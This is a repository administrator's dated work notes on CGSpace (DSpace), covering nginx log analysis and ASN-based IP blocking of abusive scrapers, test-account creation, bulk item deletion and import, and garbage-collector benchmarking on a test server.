<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">'{print $1}'</span> | sort | uniq > /tmp/2022-04-18-ips.txt
|
||||
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>The top ASNs by IP are:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">2</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
|
||||
</span></span><span style="display:flex;"><span> 102 GOOGLE
|
||||
</span></span><span style="display:flex;"><span> 139 Maxihost LTDA
|
||||
</span></span><span style="display:flex;"><span> 165 AMAZON-02
|
||||
</span></span><span style="display:flex;"><span> 393 "China Mobile Communications Group Co., Ltd."
|
||||
</span></span><span style="display:flex;"><span> 473 AMAZON-AES
|
||||
</span></span><span style="display:flex;"><span> 616 China Mobile communications corporation
|
||||
</span></span><span style="display:flex;"><span> 642 M247 Ltd
|
||||
</span></span><span style="display:flex;"><span> 2336 HostRoyale Technologies Pvt Ltd
|
||||
</span></span><span style="display:flex;"><span> 4556 Chinanet
|
||||
</span></span><span style="display:flex;"><span> 5527 CHINA UNICOM China169 Backbone
|
||||
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">4</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
|
||||
</span></span><span style="display:flex;"><span> 139 262287
|
||||
</span></span><span style="display:flex;"><span> 165 16509
|
||||
</span></span><span style="display:flex;"><span> 180 204287
|
||||
</span></span><span style="display:flex;"><span> 393 9808
|
||||
</span></span><span style="display:flex;"><span> 473 14618
|
||||
</span></span><span style="display:flex;"><span> 615 56041
|
||||
</span></span><span style="display:flex;"><span> 642 9009
|
||||
</span></span><span style="display:flex;"><span> 2156 203020
|
||||
</span></span><span style="display:flex;"><span> 4556 4134
|
||||
</span></span><span style="display:flex;"><span> 5527 4837
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc</li>
|
||||
<li>I will download the IP blocks for each ASN except Google and Amazon and ban them</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
|
||||
</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">'/^$/d'</span> -e <span style="color:#e6db74">'/^#/d'</span> -e <span style="color:#e6db74">'/^{/d'</span> -e <span style="color:#e6db74">'s/deny //'</span> -e <span style="color:#e6db74">'s/;//'</span> | sort | uniq | wc -l
|
||||
</span></span><span style="display:flex;"><span>20296
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I extracted the IPv4 and IPv6 networks:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">'/^$/d'</span> -e <span style="color:#e6db74">'/^#/d'</span> -e <span style="color:#e6db74">'/^{/d'</span> -e <span style="color:#e6db74">'s/deny //'</span> -e <span style="color:#e6db74">'s/;//'</span> | grep <span style="color:#e6db74">":"</span> | sort > /tmp/ipv6-networks.txt
|
||||
</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">'/^$/d'</span> -e <span style="color:#e6db74">'/^#/d'</span> -e <span style="color:#e6db74">'/^{/d'</span> -e <span style="color:#e6db74">'s/deny //'</span> -e <span style="color:#e6db74">'s/;//'</span> | grep -v <span style="color:#e6db74">":"</span> | sort > /tmp/ipv4-networks.txt
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I suspect we need to aggregate these networks since they are so many and nftables doesn’t like it when they overlap:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wc -l /tmp/ipv4-networks.txt
|
||||
</span></span><span style="display:flex;"><span>15464 /tmp/ipv4-networks.txt
|
||||
</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv4-networks.txt | wc -l
|
||||
</span></span><span style="display:flex;"><span>2781
|
||||
</span></span><span style="display:flex;"><span>$ wc -l /tmp/ipv6-networks.txt
|
||||
</span></span><span style="display:flex;"><span>4833 /tmp/ipv6-networks.txt
|
||||
</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv6-networks.txt | wc -l
|
||||
</span></span><span style="display:flex;"><span>338
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I deployed these lists on CGSpace, ran all updates, and rebooted the server
|
||||
<ul>
|
||||
<li>This list is SURELY too broad because we will block legitimate users in China… but right now how can I discern?</li>
|
||||
<li>Also, I need to purge the hits from these 14,000 IPs in Solr when I get time</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:</li>
|
||||
</ul>
|
||||
<p><img src="/cgspace-notes/2022/04/postgres_connections_ALL-day.png" alt="PostgreSQL connections day">
|
||||
<img src="/cgspace-notes/2022/04/jmx_dspace_sessions-day.png" alt="DSpace sessions day"></p>
|
||||
<ul>
|
||||
<li>I used <code>grepcidr</code> with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">'{print $1}'</span> | sort -u > /tmp/ips.log
|
||||
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log >> /tmp/ipv4-ips.txt; <span style="color:#66d9ef">done</span> < /tmp/ipv4-networks-aggregated.txt
|
||||
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log >> /tmp/ipv6-ips.txt; <span style="color:#66d9ef">done</span> < /tmp/ipv6-networks-aggregated.txt
|
||||
</span></span><span style="display:flex;"><span># wc -l /tmp/ipv4-ips.txt
|
||||
</span></span><span style="display:flex;"><span>15313 /tmp/ipv4-ips.txt
|
||||
</span></span><span style="display:flex;"><span># wc -l /tmp/ipv6-ips.txt
|
||||
</span></span><span style="display:flex;"><span>19 /tmp/ipv6-ips.txt
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>Then I purged them from Solr using the <code>check-spider-ip-hits.sh</code>:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
|
||||
</span></span></code></pre></div><h2 id="2022-04-23">2022-04-23</h2>
|
||||
<ul>
|
||||
<li>A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the <code>example</code> file that contains most patterns
|
||||
<ul>
|
||||
<li>I updated CGSpace, then ran all system updates and rebooted the host</li>
|
||||
<li>I also ran <code>dspace cleanup -v</code> to prune the database</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<h2 id="2022-04-24">2022-04-24</h2>
|
||||
<ul>
|
||||
<li>Start a harvest on AReS</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-26">2022-03-26</h2>
|
||||
<ul>
|
||||
<li>Update dspace-statistics-api to Falcon 3.1.0 and <a href="https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.3">release v1.4.3</a></li>
|
||||
</ul>
|
||||
<h2 id="2022-03-28">2022-03-28</h2>
|
||||
<ul>
|
||||
<li>Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p <span style="color:#e6db74">'fuuuuuuuu'</span>
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
|
||||
<ul>
|
||||
<li>According to my notes from <a href="/cgspace-notes/2020-10/">2020-10</a> the account must be in the admin group in order to submit via the REST API</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>Abenet and I noticed 1,735 items in CTA’s community that have the title “delete”
|
||||
<ul>
|
||||
<li>We asked Peter and he said we should delete them</li>
|
||||
<li>I exported the CTA community metadata and used OpenRefine to filter all items with the “delete” title, then used the “expunge” bulkedit action to remove them</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>I realized I forgot to clean up the old Let’s Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
|
||||
<ul>
|
||||
<li>I also removed the pre-Ubuntu 20.04 Let’s Encrypt stuff from the Ansble infrastructure playbooks</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-29">2022-03-29</h2>
|
||||
<ul>
|
||||
<li>Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
|
||||
<ul>
|
||||
<li>I created a filter in LibreOffice and selected the IDs for items with the action “delete”, then I created a custom text facet in OpenRefine with this GREL:</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<pre tabindex="0"><code>or(
|
||||
isNotNull(value.match('33')),
|
||||
isNotNull(value.match('179')),
|
||||
isNotNull(value.match('452')),
|
||||
isNotNull(value.match('489')),
|
||||
isNotNull(value.match('541')),
|
||||
isNotNull(value.match('568')),
|
||||
isNotNull(value.match('646')),
|
||||
isNotNull(value.match('889'))
|
||||
)
|
||||
</code></pre><ul>
|
||||
<li>Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">"-Dfile.encoding=UTF-8 -Xmx1024m"</span>
|
||||
</span></span><span style="display:flex;"><span>$ dspace import --add --eperson<span style="color:#f92672">=</span>umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-03-29-cgiar-tac.map
|
||||
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace filter-media -p <span style="color:#e6db74">"ImageMagick PDF Thumbnail"</span> -i 10947/50
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>After that I did some normalization on the <code>cg.subject.system</code> metadata and extracted a few dozen countries to the country field</li>
|
||||
<li>Start a harvest on AReS</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-30">2022-03-30</h2>
|
||||
<ul>
|
||||
<li>Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p <span style="color:#e6db74">'fuuuu'</span>
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I started looking into the request regarding the CIAT Library PDFs
|
||||
<ul>
|
||||
<li>There are over 4,000 links to PDFs hosted on that server in CGSpace metadata</li>
|
||||
<li>The links seem to be down though! I emailed Paola to ask</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<h2 id="2022-03-31">2022-03-31</h2>
|
||||
<ul>
|
||||
<li>Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC</li>
|
||||
<li>I will do the following for CMS and G1GC on DSpace Test:
|
||||
<ul>
|
||||
<li>Wait for startup</li>
|
||||
<li>Reload home page</li>
|
||||
<li>Log in</li>
|
||||
<li>Do a search for “livestock”</li>
|
||||
<li>Click AGROVOC facet for livestock</li>
|
||||
<li>dspace index-discovery -b</li>
|
||||
<li>dspace-statistics-api index</li>
|
||||
</ul>
|
||||
</li>
|
||||
<li>With CMS the Discovery Index took:</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>real 379m19.245s
|
||||
</span></span><span style="display:flex;"><span>user 267m17.704s
|
||||
</span></span><span style="display:flex;"><span>sys 4m2.937s
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>Leroy from CIAT said that the CIAT Library server has security issues so was limited to internal traffic
|
||||
<ul>
|
||||
<li>I extracted a list of URLs from CGSpace to send him:</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'https?://ciat-library') to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
|
||||
</span></span><span style="display:flex;"><span>COPY 4552
|
||||
</span></span></code></pre></div><ul>
|
||||
<li>I did some checks and cleanups in OpenRefine because there are some values with “#page” etc
|
||||
<ul>
|
||||
<li>Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs</li>
|
||||
<li>I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books</li>
|
||||
</ul>
|
||||
</li>
|
||||
</ul>
|
||||
<!-- raw HTML omitted -->
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
Reference in New Issue
Block a user